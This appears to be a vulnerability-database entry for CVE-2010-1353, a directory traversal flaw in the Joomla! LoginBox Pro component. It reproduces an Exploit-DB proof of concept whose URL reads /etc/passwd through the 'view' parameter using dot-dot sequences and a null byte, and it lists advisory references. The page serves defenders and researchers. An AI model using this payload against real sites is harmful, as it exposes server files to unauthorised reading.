CVE-2010-1353
Description
Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component LoginBox - Local File Inclusion
================================================================================================
Title : Joomla Component com_loginbox LFI Vulnerability
Date : Monday, 05 April 2010 (Indonesia)
Author : Vrs-hCk
Contact : ander[at]antisecurity.org
Blog : http://c0li.blogspot.com/
================================================================================================
[+] Exploit
http://[site]/[path]/index.php?option=com_loginbox&view=[LFI]
[+] PoC
http://localhost/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00
================================================================================================
Greetz :
www.MainHack.net - www.ServerIsDown.org - www.AntiSecurity.org
Paman, NoGe, OoN_Boy, pizzyroot, zxvf, matthews, Genex, s4va, stardustmemory,
wishnusakti, bl4Ck_3n91n3, H312Y, S3T4N, xr00tb0y, str0ke, dkk.
================================================================================================
# c0li.m0de.0n
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| wowjoomla | com_loginbox | | |
| joomla | joomla\! | | |
References
- http://packetstormsecurity.org/1004-exploits/joomlaloginbox-lfi.txt
- http://secunia.com/advisories/39349
- http://www.exploit-db.com/exploits/12068
- http://www.securityfocus.com/bid/39212
- http://www.vupen.com/english/advisories/2010/0808
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57533
- http://packetstormsecurity.org/1004-exploits/joomlaloginbox-lfi.txt
- http://secunia.com/advisories/39349
- http://www.exploit-db.com/exploits/12068
- http://www.securityfocus.com/bid/39212
- http://www.vupen.com/english/advisories/2010/0808
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57533
CWEs
CWE-22
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.